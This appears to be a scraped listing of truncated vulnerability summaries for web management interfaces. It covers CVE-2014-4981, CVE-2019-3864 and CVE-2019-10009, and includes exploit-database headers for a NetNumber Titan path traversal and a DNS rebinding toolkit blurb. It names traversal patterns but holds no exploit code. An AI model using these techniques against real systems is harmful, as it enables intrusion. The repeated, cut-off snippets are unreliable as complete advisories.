Input validation

LPAR2RRD in 3.5 and earlier allows remote attackers to execute arbitrary commands due to insufficient input sanitization of the web GUI parameters...

CVE-2014-4981

CVE-2014-4981 affects LPAR2RRD prior to 3.5 (and up to 3.5) and related versions where insufficient input sanitization of web GUI parameters allows remote attackers to execute arbitrary commands. The underlying issue is input validation that enables arbitrary command injection on the LPAR2RRD ser...

CVE-2014-4981

LPAR2RRD in 3.5 and earlier allows remote attackers to execute arbitrary commands due to insufficient input sanitization of the web GUI parameters...

CVE-2019-3864

A vulnerability was discovered in all quay-2 versions before quay-3.0.0, in the Quay web GUI where POST requests include a specific parameter which is used as a CSRF token. The token is not refreshed for every request or when a user logged out and in again. An attacker could use a leaked token to...

Cross site request forgery (csrf)

A vulnerability was discovered in all quay-2 versions before quay-3.0.0, in the Quay web GUI where POST requests include a specific parameter which is used as a CSRF token. The token is not refreshed for every request or when a user logged out and in again. An attacker could use a leaked token to...

CVE-2019-3864

CVE-2019-3864 affects all quay-2 versions prior to quay-3.0.0, where the Quay web GUI uses a CSRF token embedded in a POST parameter that is not refreshed per request or on logout, enabling an attacker with a leaked token to access a user’s account. Affected product: Red Hat Quay (Quay web applic...

CVE-2019-3864

A vulnerability was discovered in all quay-2 versions before quay-3.0.0, in the Quay web GUI where POST requests include a specific parameter which is used as a CSRF token. The token is not refreshed for every request or when a user logged out and in again. An attacker could use a leaked token to...

CVE-2019-3864

A vulnerability was discovered in the Quay web GUI where POST requests include a specific parameter which is used as a CSRF token. The token is not refreshed for every request or when a user logged out and in again. An attacker could use a leaked token to gain access to the system using the user'...

Remote code execution

/var/WEB-GUI/cgi-bin/telnet.cgi on FiberHome HG2201T 1.00.M5007JS201804 devices allows pre-authentication remote code execution...

DNS Rebinding Tool - DNS Rebind Tool With Custom Scripts

Inspired by @tavisio This project is meant to be an All-in-one Toolkit to test further DNS rebinding attacks and my take on understanding these kind of attacks. It consists of a web server and pseudo DNS server that only responds to A queries. The root index of the web server allowes to configure...

Security Bulletin: Vulnerability in system log on IBM MQ Appliance WebGUI (CVE-2017-1591)

Summary A potential cross-site scripting vulnerability exists in the IBM MQ Appliance system log. IBM has addressed the applicable CVE. Vulnerability Details CVEID: CVE-2017-1591 DESCRIPTION: IBM WebSphere DataPower Appliances 7.0.0 through 7.6 and IBM MQ Appliances are vulnerable to cross-site...

Directory traversal

A Directory Traversal issue was discovered in the Web GUI in Titan FTP Server 2019 Build 3505. When an authenticated user attempts to preview an uploaded file through PreviewHandler.ashx by using a ....\ technique, arbitrary files can be loaded in the server response outside the root directory...

CVE-2019-10009

A Directory Traversal issue was discovered in the Web GUI in Titan FTP Server 2019 Build 3505. When an authenticated user attempts to preview an uploaded file through PreviewHandler.ashx by using a ....\ technique, arbitrary files can be loaded in the server response outside the root directory...

CVE-2019-10009

A Directory Traversal issue was discovered in the Web GUI in Titan FTP Server 2019 Build 3505. When an authenticated user attempts to preview an uploaded file through PreviewHandler.ashx by using a ....\ technique, arbitrary files can be loaded in the server response outside the root directory...

CVE-2019-10009

The CVE-2019-10009 entry relates to Titan FTP Server 2019 Build 3505, where an authenticated user could exploit a Directory Traversal via PreviewHandler.ashx using a ../../.. path to load arbitrary files outside the web root. Exploit details are corroborated by multiple sources, and mitigation is...

Command injection

A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands...

NetNumber Titan ENUM/DNS/NP 7.9.1 Bypass / Traversal

Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass Google Dork: N/A Date: 4/29/2019 Exploit Author: MobileNetworkSecurity Vendor Homepage: https://www.netnumber.com/products/data Software Link: N/A Version: Titan Master 7.9.1 Tested on: Linux CVE : N/A Type: WEBAPP...

NetNumber Titan ENUMDNSNP 7.9.1 - Path Traversal Authorization Bypass

NetNumber Titan ENUMDNSNP 7.9.1 - Path Traversal Authorization Bypass Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass Google Dork: N/A Date: 4/29/2019 Exploit Author: MobileNetworkSecurity Vendor Homepage: https://www.netnumber.com/products/data Software Link: N...

NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass Vulnerabilities

Exploit for linux platform in category web applications Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass Exploit Author: MobileNetworkSecurity Vendor Homepage: https://www.netnumber.com/products/data Software Link: N/A Version: Titan Master 7.9.1 Tested on: Linux...

NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass

Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass Google Dork: N/A Date: 4/29/2019 Exploit Author: MobileNetworkSecurity Vendor Homepage: https://www.netnumber.com/products/data Software Link: N/A Version: Titan Master 7.9.1 Tested on: Linux CVE : N/A Type: WEBAPP...